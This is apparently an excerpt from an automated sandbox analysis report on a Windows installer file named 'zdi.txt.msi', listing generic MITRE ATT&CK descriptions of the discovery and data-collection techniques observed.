C:\Windows\Installer\MSI46EC.tmp

C:\Windows\Installer\MSI471C.tmp

Windows Analysis Report
zdi.txt.msi

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre